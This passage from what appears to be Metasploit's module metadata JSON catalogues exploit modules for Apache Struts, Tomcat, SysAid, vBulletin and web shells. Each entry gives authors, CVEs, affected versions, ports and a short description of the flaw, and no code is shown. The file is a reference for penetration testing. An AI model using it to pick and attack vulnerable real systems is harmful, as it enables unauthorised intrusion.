"mod_time": "2019-01-29 11:08:14 +0000",
"path": "/modules/exploits/multi/http/struts_code_exec_classloader.rb",
"is_install_path": true,
"ref_name": "multi/http/struts_code_exec_classloader",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/struts_code_exec_exception_delegator": {
"name": "Apache Struts Remote Command Execution",
"full_name": "exploit/multi/http/struts_code_exec_exception_delegator",
"rank": 600,
"disclosure_date": "2012-01-06",
"type": "exploit",
"author": [
"Johannes Dahse",
"Andreas Nusser",
"juan vazquez <juan.vazquez@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>",
"mihi"
],
"description": "This module exploits a remote command execution vulnerability in\n Apache Struts versions < 2.2.1.1. This issue is caused because the\n ExceptionDelegator interprets parameter values as OGNL expressions\n during certain exception handling for mismatched data types of properties,\n which allows remote attackers to execute arbitrary Java code via a\n crafted parameter.",
"references": [
"CVE-2012-0391",
"OSVDB-78277",
"EDB-18329"
],
"platform": "Java,Linux,Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows Universal",
"Linux Universal",
"Java Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb",
"is_install_path": true,
"ref_name": "multi/http/struts_code_exec_exception_delegator",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/struts_code_exec_parameters": {
"name": "Apache Struts ParametersInterceptor Remote Code Execution",
"full_name": "exploit/multi/http/struts_code_exec_parameters",
"rank": 600,
"disclosure_date": "2011-10-01",
"type": "exploit",
"author": [
"Meder Kydyraliev",
"Richard Hicks <scriptmonkey.blog@gmail.com>",
"mihi",
"Christian Mehlmauer <FireFart@gmail.com>"
],
"description": "This module exploits a remote command execution vulnerability in Apache Struts\n versions < 2.3.1.2. This issue is caused because the ParametersInterceptor allows\n for the use of parentheses which in turn allows it to interpret parameter values as\n OGNL expressions during certain exception handling for mismatched data types of\n properties which allows remote attackers to execute arbitrary Java code via a\n crafted parameter.",
"references": [
"CVE-2011-3923",
"OSVDB-78501",
"URL-http://blog.o0o.nu/2012/01/cve-2011-3923-yet-another-struts2.html",
"URL-https://cwiki.apache.org/confluence/display/WW/S2-009"
],
"platform": "Java,Linux,Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows Universal",
"Linux Universal",
"Java Universal"
],
"mod_time": "2018-05-16 06:15:40 +0000",
"path": "/modules/exploits/multi/http/struts_code_exec_parameters.rb",
"is_install_path": true,
"ref_name": "multi/http/struts_code_exec_parameters",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/struts_default_action_mapper": {
"name": "Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution",
"full_name": "exploit/multi/http/struts_default_action_mapper",
"rank": 600,
"disclosure_date": "2013-07-02",
"type": "exploit",
"author": [
"Takeshi Terada",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "The Struts 2 DefaultActionMapper supports a method for short-circuit navigation\n state changes by prefixing parameters with \"action:\" or \"redirect:\", followed by\n a desired navigational target expression. This mechanism was intended to help with\n attaching navigational information to buttons within forms.\n\n In Struts 2 before 2.3.15.1 the information following \"action:\", \"redirect:\" or\n \"redirectAction:\" is not properly sanitized. Since said information will be\n evaluated as OGNL expression against the value stack, this introduces the\n possibility to inject server side code.",
"references": [
"CVE-2013-2251",
"OSVDB-95405",
"BID-61189",
"URL-http://struts.apache.org/release/2.3.x/docs/s2-016.html"
],
"platform": "Linux,Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"Windows",
"Linux"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/struts_default_action_mapper.rb",
"is_install_path": true,
"ref_name": "multi/http/struts_default_action_mapper",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/struts_dev_mode": {
"name": "Apache Struts 2 Developer Mode OGNL Execution",
"full_name": "exploit/multi/http/struts_dev_mode",
"rank": 600,
"disclosure_date": "2012-01-06",
"type": "exploit",
"author": [
"Johannes Dahse",
"Andreas Nusser",
"Alvaro",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a remote command execution vulnerability in Apache\n Struts 2. The problem exists on applications running in developer mode,\n where the DebuggingInterceptor allows evaluation and execution of OGNL\n expressions, which allows remote attackers to execute arbitrary Java\n code. This module has been tested successfully on Struts 2.3.16, Tomcat\n 7 and Ubuntu 10.04.",
"references": [
"CVE-2012-0394",
"OSVDB-78276",
"EDB-18329",
"URL-https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt"
],
"platform": "Java",
"arch": "java",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Struts 2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/struts_dev_mode.rb",
"is_install_path": true,
"ref_name": "multi/http/struts_dev_mode",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/struts_dmi_exec": {
"name": "Apache Struts Dynamic Method Invocation Remote Code Execution",
"full_name": "exploit/multi/http/struts_dmi_exec",
"rank": 600,
"disclosure_date": "2016-04-27",
"type": "exploit",
"author": [
"Nixawk",
"rungobier"
],
"description": "This module exploits a remote command execution vulnerability in Apache Struts\n versions between 2.3.20 and 2.3.28 (except 2.3.20.2 and 2.3.24.2). Remote Code\n Execution can be performed via the method: prefix when Dynamic Method Invocation\n is enabled.",
"references": [
"CVE-2016-3081",
"URL-https://www.seebug.org/vuldb/ssvid-91389"
],
"platform": "Java,Linux,Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows Universal",
"Linux Universal",
"Java Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/struts_dmi_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/struts_dmi_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/struts_dmi_rest_exec": {
"name": "Apache Struts REST Plugin With Dynamic Method Invocation Remote Code Execution",
"full_name": "exploit/multi/http/struts_dmi_rest_exec",
"rank": 600,
"disclosure_date": "2016-06-01",
"type": "exploit",
"author": [
"Nixawk"
],
"description": "This module exploits a remote command execution vulnerability in Apache Struts\n versions between 2.3.20 and 2.3.28 (except 2.3.20.2 and 2.3.24.2). Remote Code\n Execution can be performed when using the REST Plugin with the ! operator when\n Dynamic Method Invocation is enabled.",
"references": [
"CVE-2016-3087",
"URL-https://www.seebug.org/vuldb/ssvid-91741"
],
"platform": "Java,Linux,Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows Universal",
"Linux Universal",
"Java Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/struts_dmi_rest_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/struts_dmi_rest_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/struts_include_params": {
"name": "Apache Struts includeParams Remote Code Execution",
"full_name": "exploit/multi/http/struts_include_params",
"rank": 500,
"disclosure_date": "2013-05-24",
"type": "exploit",
"author": [
"Eric Kobrin",
"Douglas Rodrigues",
"Richard Hicks <scriptmonkey.blog@gmail.com>"
],
"description": "This module exploits a remote command execution vulnerability in Apache Struts\n versions < 2.3.14.2. A specifically crafted request parameter can be used to inject\n arbitrary OGNL code into the stack bypassing Struts and OGNL library protections.\n When targeting an action which requires interaction through GET, the payload should\n be split, taking into account the URI limits. In this case, if the rendered JSP has\n more than one point of injection, it could result in payload corruption. This should\n happen only when the payload is larger than the URI length.",
"references": [
"CVE-2013-2115",
"CVE-2013-1966",
"OSVDB-93645",
"URL-https://cwiki.apache.org/confluence/display/WW/S2-014",
"URL-http://struts.apache.org/development/2.x/docs/s2-013.html"
],
"platform": "Java,Linux,Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows Universal",
"Linux Universal",
"Java Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/struts_include_params.rb",
"is_install_path": true,
"ref_name": "multi/http/struts_include_params",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/stunshell_eval": {
"name": "STUNSHELL Web Shell Remote PHP Code Execution",
"full_name": "exploit/multi/http/stunshell_eval",
"rank": 500,
"disclosure_date": "2013-03-23",
"type": "exploit",
"author": [
"bwall <bwall@openbwall.com>"
],
"description": "This module exploits unauthenticated versions of the \"STUNSHELL\" web shell.\n This module works when safe mode is enabled on the web server. This shell is widely\n used in automated RFI payloads.",
"references": [
"OSVDB-91842",
"URL-https://defense.ballastsecurity.net/wiki/index.php/STUNSHELL",
"URL-https://defense.ballastsecurity.net/decoding/index.php?hash=a4cd8ba05eb6ba7fb86dd66bed968007"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"stunshell"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/stunshell_eval.rb",
"is_install_path": true,
"ref_name": "multi/http/stunshell_eval",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/stunshell_exec": {
"name": "STUNSHELL Web Shell Remote Code Execution",
"full_name": "exploit/multi/http/stunshell_exec",
"rank": 500,
"disclosure_date": "2013-03-23",
"type": "exploit",
"author": [
"bwall <bwall@openbwall.com>"
],
"description": "This module exploits unauthenticated versions of the \"STUNSHELL\" web shell.\n This module works when safe mode is disabled on the web server. This shell is\n widely used in automated RFI payloads.",
"references": [
"OSVDB-91842",
"URL-https://defense.ballastsecurity.net/wiki/index.php/STUNSHELL",
"URL-https://defense.ballastsecurity.net/decoding/index.php?hash=a4cd8ba05eb6ba7fb86dd66bed968007"
],
"platform": "Unix,Windows",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"stunshell / Unix",
"stunshell / Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/stunshell_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/stunshell_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/sun_jsws_dav_options": {
"name": "Sun Java System Web Server WebDAV OPTIONS Buffer Overflow",
"full_name": "exploit/multi/http/sun_jsws_dav_options",
"rank": 500,
"disclosure_date": "2010-01-20",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a buffer overflow in Sun Java Web Server prior to\n version 7 Update 8. By sending an \"OPTIONS\" request with an overly long\n path, attackers can execute arbitrary code. In order to reach the vulnerable\n code, the attacker must also specify the path to a directory with WebDAV\n enabled.\n\n This exploit was tested and confirmed to work on Windows XP SP3 without DEP.\n Versions for other platforms are vulnerable as well.\n\n The vulnerability was originally discovered and disclosed by Evgeny Legerov of\n Intevydis.",
"references": [
"CVE-2010-0361",
"OSVDB-61851"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Sun Java System Web Server 7.0 update 7 on Windows x86 (SEH)",
"Debug Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/sun_jsws_dav_options.rb",
"is_install_path": true,
"ref_name": "multi/http/sun_jsws_dav_options",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/sysaid_auth_file_upload": {
"name": "SysAid Help Desk Administrator Portal Arbitrary File Upload",
"full_name": "exploit/multi/http/sysaid_auth_file_upload",
"rank": 600,
"disclosure_date": "2015-06-03",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits a file upload vulnerability in SysAid Help Desk.\n The vulnerability exists in the ChangePhoto.jsp in the administrator portal,\n which does not correctly handle directory traversal sequences and does not\n enforce file extension restrictions. While an attacker needs an administrator\n account in order to leverage this vulnerability, there is a related Metasploit\n auxiliary module which can create this account under some circumstances.\n This module has been tested in SysAid v14.4 in both Linux and Windows.",
"references": [
"CVE-2015-2994",
"URL-https://seclists.org/fulldisclosure/2015/Jun/8"
],
"platform": "Linux,Windows",
"arch": "x86",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"SysAid Help Desk v14.4 / Linux",
"SysAid Help Desk v14.4 / Windows"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/multi/http/sysaid_auth_file_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/sysaid_auth_file_upload",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/sysaid_rdslogs_file_upload": {
"name": "SysAid Help Desk 'rdslogs' Arbitrary File Upload",
"full_name": "exploit/multi/http/sysaid_rdslogs_file_upload",
"rank": 600,
"disclosure_date": "2015-06-03",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits a file upload vulnerability in SysAid Help Desk v14.3 and v14.4.\n The vulnerability exists in the RdsLogsEntry servlet which accepts unauthenticated\n file uploads and handles zip file contents in an insecure way. By combining both weaknesses,\n a remote attacker can accomplish remote code execution. Note that this will only work if the\n target is running Java 6 or 7 up to 7u25, as Java 7u40 and above introduces a protection\n against null byte injection in file names. This module has been tested successfully on version\n v14.3.12 b22 and v14.4.32 b25 in Linux. In theory this module also works on Windows, but SysAid\n seems to bundle Java 7u40 and above with the Windows package which prevents the vulnerability\n from being exploited.",
"references": [
"CVE-2015-2995",
"URL-https://seclists.org/fulldisclosure/2015/Jun/8"
],
"platform": "Java",
"arch": "java",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"SysAid Help Desk v14.3 - 14.4 / Java Universal"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/sysaid_rdslogs_file_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/testlink_upload_exec": {
"name": "TestLink v1.9.3 Arbitrary File Upload Vulnerability",
"full_name": "exploit/multi/http/testlink_upload_exec",
"rank": 600,
"disclosure_date": "2012-08-13",
"type": "exploit",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a vulnerability in TestLink version 1.9.3 or prior.\n This application has an upload feature that allows any authenticated\n user to upload arbitrary files to the '/upload_area/nodes_hierarchy/'\n directory with a randomized file name. The file name can be retrieved from\n the database using SQL injection.",
"references": [
"CVE-2012-0938",
"OSVDB-85446",
"EDB-20500",
"URL-http://itsecuritysolutions.org/2012-08-13-TestLink-1.9.3-multiple-vulnerabilities/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/multi/http/testlink_upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/testlink_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/tomcat_jsp_upload_bypass": {
"name": "Tomcat RCE via JSP Upload Bypass",
"full_name": "exploit/multi/http/tomcat_jsp_upload_bypass",
"rank": 600,
"disclosure_date": "2017-10-03",
"type": "exploit",
"author": [
"peewpw"
],
"description": "This module uploads a JSP payload to the target Tomcat server and executes it.",
"references": [
"CVE-2017-12617",
"URL-http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12617",
"URL-https://bz.apache.org/bugzilla/show_bug.cgi?id=61542"
],
"platform": "Linux,Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"Java Windows",
"Java Linux"
],
"mod_time": "2017-10-11 15:53:35 +0000",
"path": "/modules/exploits/multi/http/tomcat_jsp_upload_bypass.rb",
"is_install_path": true,
"ref_name": "multi/http/tomcat_jsp_upload_bypass",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/tomcat_mgr_deploy": {
"name": "Apache Tomcat Manager Application Deployer Authenticated Code Execution",
"full_name": "exploit/multi/http/tomcat_mgr_deploy",
"rank": 600,
"disclosure_date": "2009-11-09",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module can be used to execute a payload on Apache Tomcat servers that\n have an exposed \"manager\" application. The payload is uploaded as a WAR archive\n containing a jsp application using a PUT request.\n\n The manager application can also be abused using /manager/html/upload, but that\n method is not implemented in this module.\n\n NOTE: The compatible payload sets vary based on the selected target. For\n example, you must select the Windows target to use native Windows payloads.",
"references": [
"CVE-2009-3843",
"OSVDB-60317",
"CVE-2009-4189",
"OSVDB-60670",
"CVE-2009-4188",
"BID-38084",
"CVE-2010-0557",
"URL-http://www-01.ibm.com/support/docview.wss?uid=swg21419179",
"CVE-2010-4094",
"ZDI-10-214",
"CVE-2009-3548",
"OSVDB-60176",
"BID-36954",
"URL-http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html"
],
"platform": "Java,Linux,Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"Java Universal",
"Windows Universal",
"Linux x86"
],
"mod_time": "2018-08-20 15:43:07 +0000",
"path": "/modules/exploits/multi/http/tomcat_mgr_deploy.rb",
"is_install_path": true,
"ref_name": "multi/http/tomcat_mgr_deploy",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/tomcat_mgr_upload": {
"name": "Apache Tomcat Manager Authenticated Upload Code Execution",
"full_name": "exploit/multi/http/tomcat_mgr_upload",
"rank": 600,
"disclosure_date": "2009-11-09",
"type": "exploit",
"author": [
"rangercha"
],
"description": "This module can be used to execute a payload on Apache Tomcat servers that\n have an exposed \"manager\" application. The payload is uploaded as a WAR archive\n containing a jsp application using a POST request against the /manager/html/upload\n component.\n\n NOTE: The compatible payload sets vary based on the selected target. For\n example, you must select the Windows target to use native Windows payloads.",
"references": [
"CVE-2009-3843",
"OSVDB-60317",
"CVE-2009-4189",
"OSVDB-60670",
"CVE-2009-4188",
"BID-38084",
"CVE-2010-0557",
"URL-http://www-01.ibm.com/support/docview.wss?uid=swg21419179",
"CVE-2010-4094",
"ZDI-10-214",
"CVE-2009-3548",
"OSVDB-60176",
"BID-36954",
"URL-http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html"
],
"platform": "Java,Linux,Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Java Universal",
"Windows Universal",
"Linux x86"
],
"mod_time": "2018-08-20 15:43:07 +0000",
"path": "/modules/exploits/multi/http/tomcat_mgr_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/tomcat_mgr_upload",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/traq_plugin_exec": {
"name": "Traq admincp/common.php Remote Code Execution",
"full_name": "exploit/multi/http/traq_plugin_exec",
"rank": 600,
"disclosure_date": "2011-12-12",
"type": "exploit",
"author": [
"EgiX",
"TecR0c <roccogiovannicalvi@gmail.com>"
],
"description": "This module exploits an arbitrary command execution vulnerability in\n Traq 2.0 to 2.3. It's in the admincp/common.php script.\n\n This function is called in each script located in the /admincp/ directory to\n make sure the user has admin rights. This is a broken authorization scheme\n because the header() function doesn't stop the execution flow.\n This can be exploited by malicious users to execute admin functionality,\n e.g. execution of arbitrary PHP code leveraging the plugins.php functionality.",
"references": [
"OSVDB-77556",
"EDB-18213",
"URL-http://traqproject.org/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/traq_plugin_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/traq_plugin_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi": {
"name": "Trend Micro Threat Discovery Appliance admin_sys_time.cgi Remote Command Execution",
"full_name": "exploit/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi",
"rank": 600,
"disclosure_date": "2017-04-10",
"type": "exploit",
"author": [
"mr_me <steventhomasseeley@gmail.com>",
"Roberto Suggi Liverani <Roberto Suggi Liverani @malerisch>"
],
"description": "This module exploits two vulnerabilities in the Trend Micro Threat Discovery Appliance.\n The first is an authentication bypass vulnerability via a file delete in logoff.cgi\n which resets the admin password back to 'admin' upon a reboot (CVE-2016-7552).\n The second is a cmdi flaw using the timezone parameter in the admin_sys_time.cgi\n interface (CVE-2016-7547).\n\n Note: You have the option to use the authentication bypass or not since it requires\n that the server is rebooted. The password reset will render the authentication useless.\n Typically, if an administrator can't login, they will bounce the box. Therefore, this\n module performs a heartbeat request until the box is bounced and then attempts to login\n and to perform the command injection. This module has been tested on version 2.6.1062r1\n of the appliance.",
"references": [
"URL-https://asciinema.org/a/112480",
"CVE-2016-7552",
"CVE-2016-7547"
],
"platform": "Linux",
"arch": "x86",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Trend Micro Threat Discovery Appliance 2.6.1062r1"
],
"mod_time": "2017-09-07 21:18:50 +0000",
"path": "/modules/exploits/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi.rb",
"is_install_path": true,
"ref_name": "multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/uptime_file_upload_1": {
"name": "Idera Up.Time Monitoring Station 7.0 post2file.php Arbitrary File Upload",
"full_name": "exploit/multi/http/uptime_file_upload_1",
"rank": 600,
"disclosure_date": "2013-11-19",
"type": "exploit",
"author": [
"Denis Andzakovic <denis.andzakovic@security-assessment.com>"
],
"description": "This module exploits an arbitrary file upload vulnerability found within the Up.Time\n monitoring server 7.2 and below. A malicious entity can upload a PHP file into the\n webroot without authentication, leading to arbitrary code execution.\n\n Although the vendor fixed Up.Time to prevent this vulnerability, it was not properly\n mitigated. To exploit against a newer version of Up.Time (such as 7.4), please use\n exploits/multi/http/uptime_file_upload_2.",
"references": [
"OSVDB-100423",
"BID-64031",
"URL-http://www.security-assessment.com/files/documents/advisory/Up.Time%207.2%20-%20Arbitrary%20File%20Upload.pdf"
],
"platform": "PHP",
"arch": "php",
"rport": 9999,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Up.Time 7.0/7.2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/uptime_file_upload_1.rb",
"is_install_path": true,
"ref_name": "multi/http/uptime_file_upload_1",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/uptime_file_upload_2": {
"name": "Idera Up.Time Monitoring Station 7.4 post2file.php Arbitrary File Upload",
"full_name": "exploit/multi/http/uptime_file_upload_2",
"rank": 600,
"disclosure_date": "2013-11-18",
"type": "exploit",
"author": [
"Denis Andzakovic",
"Ewerson Guimaraes(Crash) <crash@dclabs.com.br>",
"Gjoko Krstic(LiquidWorm) <gjoko@zeroscience.mk>"
],
"description": "This module exploits a vulnerability found in Uptime version 7.4.0 and 7.5.0.\n\n The vulnerability began as a classic arbitrary file upload vulnerability in post2file.php,\n which can be exploited by exploits/multi/http/uptime_file_upload_1.rb, but it was mitigated\n by the vendor.\n\n Although the mitigation in place will prevent uptime_file_upload_1.rb from working, it\n can still be bypassed to gain privilege escalation, allowing the attacker to upload files\n again and execute arbitrary commands.",
"references": [
"EDB-37888",
"URL-http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5254.php"
],
"platform": "PHP",
"arch": "php",
"rport": 9999,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-07 21:18:50 +0000",
"path": "/modules/exploits/multi/http/uptime_file_upload_2.rb",
"is_install_path": true,
"ref_name": "multi/http/uptime_file_upload_2",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/v0pcr3w_exec": {
"name": "v0pCr3w Web Shell Remote Code Execution",
"full_name": "exploit/multi/http/v0pcr3w_exec",
"rank": 500,
"disclosure_date": "2013-03-23",
"type": "exploit",
"author": [
"bwall <bwall@openbwall.com>"
],
"description": "This module exploits a lack of authentication in the shell developed by v0pCr3w,\n which is widely reused in automated RFI payloads. This module takes advantage of the\n shell's various methods to execute commands.",
"references": [
"OSVDB-91841",
"URL-https://defense.ballastsecurity.net/wiki/index.php/V0pCr3w_shell",
"URL-https://defense.ballastsecurity.net/decoding/index.php?hash=f6b534edf37c3cc0aa88997810daf9c0"
],
"platform": "Unix,Windows",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"v0pCr3w / Unix",
"v0pCr3w / Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/v0pcr3w_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/v0pcr3w_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/vbseo_proc_deutf": {
"name": "vBSEO proc_deutf() Remote PHP Code Injection",
"full_name": "exploit/multi/http/vbseo_proc_deutf",
"rank": 600,
"disclosure_date": "2012-01-23",
"type": "exploit",
"author": [
"EgiX <n0b0d13s@gmail.com>"
],
"description": "This module exploits a vulnerability in the 'proc_deutf()' function\n defined in /includes/functions_vbseocp_abstract.php for vBSEO versions\n 3.6.0 and earlier. User input passed through 'char_repl' POST parameter\n isn't properly sanitized before being used in a call to preg_replace()\n function which uses the 'e' modifier. This can be exploited to inject\n and execute arbitrary code leveraging the PHP's complex curly syntax.",
"references": [
"CVE-2012-5223",
"OSVDB-78508",
"BID-51647",
"EDB-18424"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2018-07-08 18:46:04 +0000",
"path": "/modules/exploits/multi/http/vbseo_proc_deutf.rb",
"is_install_path": true,
"ref_name": "multi/http/vbseo_proc_deutf",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/vbulletin_unserialize": {
"name": "vBulletin 5.1.2 Unserialize Code Execution",
"full_name": "exploit/multi/http/vbulletin_unserialize",
"rank": 600,
"disclosure_date": "2015-11-04",
"type": "exploit",
"author": [
"Netanel Rubin",
"cutz",
"Julien (jvoisin) Voisin"
],
"description": "This module exploits a PHP object injection vulnerability in vBulletin 5.1.2 to 5.1.9",
"references": [
"CVE-2015-7808",
"EDB-38629",
"URL-http://pastie.org/pastes/10527766/text?key=wq1hgkcj4afb9ipqzllsq",
"URL-http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting",
"vBulletin 5.0.X",
"vBulletin 5.1.X"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/vbulletin_unserialize.rb",
"is_install_path": true,
"ref_name": "multi/http/vbulletin_unserialize",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
